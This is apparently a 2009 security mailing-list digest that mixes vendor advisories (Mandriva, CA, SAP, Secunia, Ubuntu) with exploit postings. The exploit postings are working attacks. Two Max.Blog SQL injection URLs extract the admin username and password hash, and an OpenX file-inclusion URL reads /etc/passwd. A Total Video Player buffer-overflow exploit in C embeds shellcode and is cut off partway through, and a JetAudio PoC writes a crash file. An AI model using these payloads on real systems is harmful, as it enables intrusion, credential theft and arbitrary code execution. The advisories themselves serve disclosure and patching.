Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
### Salvatore "drosophila" Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog <= 1.0.6 Bug:* SQL Injection Exploitation: Remote Dork: intext:"Powered by Max.Blog" Date: 27 Jan 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta e-mail: drosophila...@gmail.com - BUGS SQL Injection: Requisites: magic quotes = off File affected: submit_post.php This bug allows a registered user to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23 -- Salvatore "drosophila" Fresta CWNP444351
[ MDVSA-2009:030 ] amarok
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:030 http://www.mandriva.com/security/ ___ Package : amarok Date: January 26, 2009 Affected: 2008.1, 2009.0 ___ Problem Description: Data length values in metadata Audible Audio media file (.aa) can lead to an integer overflow enabling remote attackers use it to trigger an heap overflow and enabling the possibility to execute arbitrary code (CVE-2009-0135). Failure on checking heap allocation on Audible Audio media files (.aa) allows remote attackers either to cause denial of service or execute arbitrary code via a crafted media file (CVE-2009-0136). This update provide the fix for these security issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136 ___ Updated Packages: Mandriva Linux 2008.1: 1a8246a202bcc785f761a97978599a58 2008.1/i586/amarok-1.4.8-12.2mdv2008.1.i586.rpm 1783e7430e515d4a6144647c50ae8def 2008.1/i586/amarok-engine-void-1.4.8-12.2mdv2008.1.i586.rpm 7ea34714db78c48ba57efba24259b1e8 2008.1/i586/amarok-engine-xine-1.4.8-12.2mdv2008.1.i586.rpm 9741e2d710a7f0138b17d8ae5253db3b 2008.1/i586/amarok-engine-yauap-1.4.8-12.2mdv2008.1.i586.rpm 07e042b5b18e4d3c7e030d8fcf796b07 2008.1/i586/amarok-scripts-1.4.8-12.2mdv2008.1.i586.rpm 260e9de9cecd888ff2f2d27f2ded127f 2008.1/i586/libamarok0-1.4.8-12.2mdv2008.1.i586.rpm 2267841689410ebf301431611c626da1 2008.1/i586/libamarok0-scripts-1.4.8-12.2mdv2008.1.i586.rpm 301b052ea6661df51e95cb0e7d616961 2008.1/i586/libamarok-devel-1.4.8-12.2mdv2008.1.i586.rpm 815a7454f91161542127005d1b4d5143 2008.1/i586/libamarok-scripts-devel-1.4.8-12.2mdv2008.1.i586.rpm e06458ad6529e0be044c136797bfa1c8 2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: ffdd3bd41a32d4e62f816c109df8 2008.1/x86_64/amarok-1.4.8-12.2mdv2008.1.x86_64.rpm ec10186c7ede7a88e5b17556cdd2dfb0 2008.1/x86_64/amarok-engine-void-1.4.8-12.2mdv2008.1.x86_64.rpm 43afd708057335d8240d8089dac7b407 2008.1/x86_64/amarok-engine-xine-1.4.8-12.2mdv2008.1.x86_64.rpm 3495536bfa3eb6316bc9f4b3bf0e21d0 2008.1/x86_64/amarok-engine-yauap-1.4.8-12.2mdv2008.1.x86_64.rpm f686b429164bcf5568c354fe04069aca 2008.1/x86_64/amarok-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm 37c16f39f142bbe43f77ebd8662a1241 2008.1/x86_64/lib64amarok0-1.4.8-12.2mdv2008.1.x86_64.rpm 7d655865abe84d513fc6b661f06ca8ef 2008.1/x86_64/lib64amarok0-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm e2e6f738de6f3d4adec513b3fc6fd46d 2008.1/x86_64/lib64amarok-devel-1.4.8-12.2mdv2008.1.x86_64.rpm 21a51b57b01ea6e9b2623c8f7b73a20e 2008.1/x86_64/lib64amarok-scripts-devel-1.4.8-12.2mdv2008.1.x86_64.rpm e06458ad6529e0be044c136797bfa1c8 2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm Mandriva Linux 2009.0: dfa1b151504f4f1d300b1c20d2759569 2009.0/i586/amarok-2.0-1.2mdv2009.0.i586.rpm 074f96428803ec95886965de2430b1d7 2009.0/i586/amarok-scripts-2.0-1.2mdv2009.0.i586.rpm 7bc361ce058e5e28f76fffca7b45e804 2009.0/i586/libamarok-devel-2.0-1.2mdv2009.0.i586.rpm 4f3f0f5b6fe7b82722056c60e145e55e 2009.0/i586/libamaroklib1-2.0-1.2mdv2009.0.i586.rpm 98975dd8bd348c8b497c706550559798 2009.0/i586/libamarokplasma2-2.0-1.2mdv2009.0.i586.rpm 3f411fc8f8a2d5040071e3c5c17e0750 2009.0/i586/libamarokpud1-2.0-1.2mdv2009.0.i586.rpm 00449f621b74a45337c6edf067155639 2009.0/i586/libamarok_taglib1-2.0-1.2mdv2009.0.i586.rpm 250b512463a015324ae1f7bce6a4381f 2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 9d3041f66c3c88492c9b217625a3d8b9 2009.0/x86_64/amarok-2.0-1.2mdv2009.0.x86_64.rpm 6336ad0873c72428133dc72499edb386 2009.0/x86_64/amarok-scripts-2.0-1.2mdv2009.0.x86_64.rpm e2af1726c929428a61cef94c28561f69 2009.0/x86_64/lib64amarok-devel-2.0-1.2mdv2009.0.x86_64.rpm ecdafc395867d7c62e02015faa000d15 2009.0/x86_64/lib64amaroklib1-2.0-1.2mdv2009.0.x86_64.rpm c682cd1bd6b557184fe81f1aa2fb2953 2009.0/x86_64/lib64amarokplasma2-2.0-1.2mdv2009.0.x86_64.rpm 76af360ed85f551f6aa8e204ef2f2f43 2009.0/x86_64/lib64amarokpud1-2.0-1.2mdv2009.0.x86_64.rpm abaf80b0b0d0e7bd5ca32ba7413671aa 2009.0/x86_64/lib64amarok_taglib1-2.0-1.2mdv2009.0.x86_64.rpm 250b512463a015324ae1f7bce6a4381f 2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can
Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
### Salvatore "drosophila" Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog <= 1.0.6 Bug:* SQL Injection Exploitation: Remote Dork: intext:"Powered by Max.Blog" Date: 20 Jan 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta e-mail: drosophila...@gmail.com - BUGS SQL Injection: File affected: show_post.php This bug allows a guest to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23 -- Salvatore "drosophila" Fresta CWNP444351
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities CA Advisory Reference: CA20090126-01 CA Advisory Date: 2009-01-26 Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG Impact: A remote attacker can evade detection. Summary: The CA Anti-Virus engine contains multiple vulnerabilities that can allow a remote attacker to evade detection by the Anti-Virus engine by creating a malformed archive file in one of several common file archive formats. CA has released a new Anti-Virus engine to address the vulnerabilities. The vulnerabilities, CVE-2009-0042, are due to improper handling of malformed archive files by the Anti-Virus engine. A remote attacker can create a malformed archive file that potentially contains malware and evade anti-virus detection. Note: After files have been extracted from an archive, the desktop Anti-Virus engine is able to scan all files for malware. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine. Mitigating Factors: See note above. Severity: CA has given these vulnerabilities a Low risk rating. Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, r8, r8.1 CA Anti-Virus 2007 (v8), 2008 eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3), 2008 CA Internet Security Suite Plus 2008 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8, 8.1 CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1 CA Protection Suites r2, r3, r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0, 8.1 CA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) r8, 8.1 CA Anti-Spyware 2007, 2008 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0, r3.1, r11, r11.1 CA ARCserve Backup r11.1, r11.5, r12 on Windows CA ARCserve Backup r11.1, r11.5 Linux CA ARCserve client agent for Windows CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0 CA Common Services (CCS) r11, r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) Non-Affected Products: CA Anti-Virus engine with arclib version 7.3.0.15 installed Affected Platforms: Windows UNIX Linux Solaris Mac OS X NetWare Status and Recommendation: CA released arclib 7.3.0.15 in September 2008. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product. How to determine if you are affected: For products on Windows: 1. Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*). 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is earlier than indicated below, the installation is vulnerable. File NameFile Version arclib.dll 7.3.0.15 *For eTrust Intrusion Detection 2.0 the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common". For CA Anti-Virus r8.1 on non-Windows platforms: Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 7.3.0.15, the installation is vulnerable. Example compver utility output: COMPONENT NAME VERSION eTrust Antivirus Arclib Archive Library 7.3.0.15 ... (followed by other components) For reference, the following are file names for arclib on non-Windows operating systems: Operating SystemFile name Solaris libarclib.so Linux libarclib.so Mac OS Xarclib.bundle Workaround: Do not open email attachments or download files from untrusted sources. References (URLs may wrap): CA Support: http://support.ca.com/ CA20090126-01: Security Notice for CA Anti-Virus Engine https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1976 01 Solution Document Reference APARs: n/a CA Security Response Blog posting: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG http://www.nruns.com/ http://secdev.zoller.lu CVE References: CVE-2009-0042 - Anti-Virus detection evasion http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional informati
Total video player 1.3.7 local buffer overflow universal exploit
/*simo36.tvp-bof.c Authour : SimO-s0fT Home : www.exploiter-ma.com greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends bahjawi danger khod nasi7a EAX 0034F928 ASCII "AA ECX 4141 EDX 00340608 EBX 41414141 ESP 0012BF44 EBP 0012C160 ESI 0034F920 ASCII "AA EDI 41414141 EIP 7C92B3FB ntdll.7C92B3FB */ #include #include #include #include #define OFFSET 549 char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46" "\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47" "\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20" "\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c"; char scode1[]= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" "\x4e\x46\x43\x36\x42\x50\x5a"; char scode2[]= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" "\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; int main(int argc,char *argv[]){ FILE *openfile; unsigned char *buffer; unsigned int offset=0; unsigned int RET=0x7c85d568; int number=0; printf("*\n"); printf("Total Video Player local universal buffer overflow exploit\n"); printf("Cded by SimO-s0fT(s...@exploiter-ma.com)"); printf("greetz : to Allah \n"); printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n"); printf("***\n"); scanf("%d",&number); if((openfile=fopen(argv[1],"wb"))==NULL){ perror("connot opening .!!\n");
SAP NetWeaver XSS Vulnerability
# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # # # # Product: NetWeaver/Web DynPro # Vendor:SAP (www.sap.com) # CVD ID:CVE-2008-3358 # Subject: Cross-Site Scripting Vulnerability # Risk: High # Effect:Remotely exploitable # Author:Martin Suess # Date: January 27th 2009 # # Introduction: - The vulnerability found targets the SAP NetWeaver portal. It is possible to execute JavaScript code in the browser of a valid user when clicking on a specially crafted URL which can be sent to the user by email. This vulnerability can be used to steal the user's session cookie or redirect him to a phishing website which shows the (faked) login screen and gets his logon credentials as soon as he tries to log in on the faked site. Affected: - - All tested versions that are vulnerable SAP NetWeaver/Web DynPro [for detailed Information, see SAP Notification 1235253] Description: A specially crafted URL in SAP NetWeaver allows an attacker to launch a Cross-Site Scripting attack. The resulting page contains only the unfiltered value of the vulnerable parameter. It is possible to create an URL which causes the resulting page to contain malicious JavaScript code. A response to such a request could look like the following example: HTTP/1.1 200 OK Date: Fri, 18 Jul 2008 13:13:30 GMT Server: content-type: text/plain Content-Length: 67 Keep-Alive: timeout=10, max=500 Connection: Keep-Alive test The code only gets executed in Microsoft Internet Explorer (tested with version 7.0.5730 only). In Firefox (tested with version 3.0 only) it did not get executed as the content-type header of the server response is interpreted more strictly (text/plain). SAP Information Policy: --- The information is available to registered SAP clients only (SAP Security Notes). Patches: Apply the latest SAP security patches for Netweaver. For more detailed patch information, see SAP notification number 1235253. Timeline: - Vendor Status: Patch released Vendor Notified:July 21st 2008 Vendor Response:July 28th 2008 Patch available:October 2008 Advisory Release: January 27th 2009 References: --- - SAP Notification 1235253 (problem and patches)
JetAudio Basic 7.0.3 BufferOverFlow PoC
#!/usr/bin/python #By ALpHaNiX #NullArea.Net # proofs of concept #EAX #ECX 41414141 #EDX 0001 #EBX 7FFD3000 #ESP 04ECFD8C #EBP 04ECFDBC #ESI 041F8648 #EDI 41414141 #EIP 7711737D kernel32.7711737D #ESI & EDI Overritten print "[+] JetAudio Basic 7.0.3 BufferOverFlow PoC" lol="alpix.m3u" file=open(lol,'w') file.write("\x41"*1065987) file.close() print "[+]",lol,"File created "
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)
Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities CA Advisory Reference: CA20090123-01 CA Advisory Date: 2009-01-23 Reported By: n/a Impact: Refer to the CVE identifiers for details. Summary: Multiple security risks exist in Apache Tomcat as included with CA Cohesion Application Configuration Manager. CA has issued an update to address the vulnerabilities. Refer to the References section for the full list of resolved issues by CVE identifier. Mitigating Factors: None Severity: CA has given these vulnerabilities a Medium risk rating. Affected Products: CA Cohesion Application Configuration Manager 4.5 Non-Affected Products CA Cohesion Application Configuration Manager 4.5 SP1 Affected Platforms: Windows Status and Recommendation: CA has issued the following update to address the vulnerabilities. CA Cohesion Application Configuration Manager 4.5: RO04648 https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search &searchID=RO04648 How to determine if you are affected: 1. Using Windows Explorer, locate the file "RELEASE-NOTES". 2. By default, the file is located in the "C:\Program Files\CA\Cohesion\Server\server\" directory. 3. Open the file with a text editor. 4. If the version is less than 5.5.25, the installation is vulnerable. Workaround: None References (URLs may wrap): CA Support: http://support.ca.com/ CA20090123-01: Security Notice for Cohesion Tomcat https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1975 40 Solution Document Reference APARs: RO04648 CA Security Response Blog posting: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx Reported By: n/a CVE References: CVE-2005-2090 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090 CVE-2005-3510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510 CVE-2006-3835 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835 CVE-2006-7195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195 CVE-2006-7196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196 CVE-2007-0450 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450 CVE-2007-1355 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355 CVE-2007-1358 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358 CVE-2007-1858 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858 CVE-2007-2449 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449 CVE-2007-2450 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450 CVE-2007-3382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382 CVE-2007-3385 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385 CVE-2007-3386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386 CVE-2008-0128 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128 *Note: the issue was not completely fixed by Tomcat maintainers. OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release v1.1 - Updated Impact, Summary, Affected Products Customers who require additional information should contact CA Technical Support at http://support.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777 82 Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved.
OpenX 2.6.3 - Local File Inclusion
I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/ Here is a snip of the code: [snip] include_once '../../init-delivery.php'; $MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type'; if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) { echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified'; exit(1); } $tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME]; $tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php'; if(!file_exists($tagFileName)) { echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists'; exit(1); } include $tagFileName; [/snip] As you can see, it is checking whether the file you have inputted exists. This can be exploited like so: http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00 Enjoy. -Charlie [Elites0ft.com]
Secunia Research: OpenX Multiple Vulnerabilities
== Secunia Research 27/01/2009 - OpenX Multiple Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * OpenX 2.6.3 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: SQL Injection Local File Inclusion Cross-Site Scripting Cross-Site Request Forgery Where: Remote == 3) Vendor's Description of Software "OpenX is a popular free ad server used to manage the advertising on over 100,000 websites in more than 100 countries around the world. Use OpenX to take control of the advertising on your sites". Product Link: http://www.openx.org/ == 4) Description of Vulnerabilities Multiple vulnerabilities have been discovered in OpenX, which can be exploited by malicious people to conduct cross-site scripting, cross-site request forgery, and file inclusion attacks and by malicious users to conduct script insertion and SQL injection attacks. 1) Input passed to the "clientid" parameter in "www/admin/banner- acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php", "www/admin/campaign- banners.php", and "www/admin/banner-activate.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 2) Input passed to the "orderdirection" and "listorder" parameters in "www/admin/userlog-index.php" and "www/admin/stats.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 3) Input passed to the "origPublisherId" parameter in "www/admin/userlog-index.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 4) Input passed to "setPerPage", "day", "period_end", "period_start", and "statsBreakdown" parameters in "www/admin/stats.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 5) Input passed to the "campaignid" parameter in "www/admin/banner- acl.php", "www/admin/banner-edit.php", "www/admin/banner-acl.php", "www/admin/campaign-zone.php", and "www/admin/campaign-banners.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 6) Input passed to the "bannerid" parameter in "www/admin/banner- acl.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 7) Input passed to the "affiliateid" parameter in "www/admin/zone- probability.php", "www/admin/zone-invocation.php", "www/admin/affiliate-zones.php", and "www/admin/zone-include.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 8) Input passed to the "zoneid" parameter in "www/admin/zone- probability.php", "www/admin/zone-invocation.php", and "www/admin/zone-include.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. 9) Input passed to the "userid" parameter in "www/admin/admin- user.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbi
[USN-712-1] Vim vulnerabilities
=== Ubuntu Security Notice USN-712-1 January 27, 2009 vim vulnerabilities CVE-2008-2712, CVE-2008-4101 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: vim 1:6.4-006+2ubuntu6.2 vim-runtime 1:6.4-006+2ubuntu6.2 Ubuntu 7.10: vim 1:7.1-056+2ubuntu2.1 vim-runtime 1:7.1-056+2ubuntu2.1 Ubuntu 8.04 LTS: vim 1:7.1-138+1ubuntu3.1 vim-runtime 1:7.1-138+1ubuntu3.1 Ubuntu 8.10: vim 1:7.1.314-3ubuntu3.1 vim-runtime 1:7.1.314-3ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jan Minar discovered that Vim did not properly sanitize inputs before invoking the execute or system functions inside Vim scripts. If a user were tricked into running Vim scripts with a specially crafted input, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2712) Ben Schmidt discovered that Vim did not properly escape characters when performing keyword or tag lookups. If a user were tricked into running specially crafted commands, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4101) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.diff.gz Size/MD5: 199371 085ca7601cc068cc572c8cee1d25529f http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.dsc Size/MD5: 1331 42f100409e8290158363e03eba87126c http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4.orig.tar.gz Size/MD5: 5740778 b893e7167089e788091f80c72476f0d3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_6.4-006+2ubuntu6.2_all.deb Size/MD5: 1732888 bcbc824e5296fea0ea3dd16b2ca54bc8 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_6.4-006+2ubuntu6.2_all.deb Size/MD5: 3594550 84cc69c7fd6b266f697d189cd67c1f69 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_amd64.deb Size/MD5:83548 8445c214e8f5d3b04077800b3c795799 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 844928 1bf3bfb3b3552f2b7f77d9250517cbed http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_amd64.deb Size/MD5:70034 7c8e29ed88bde4310459b8adfa6a5243 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 84 99bd94b62dfb322a66dc1c1a98ef4efb 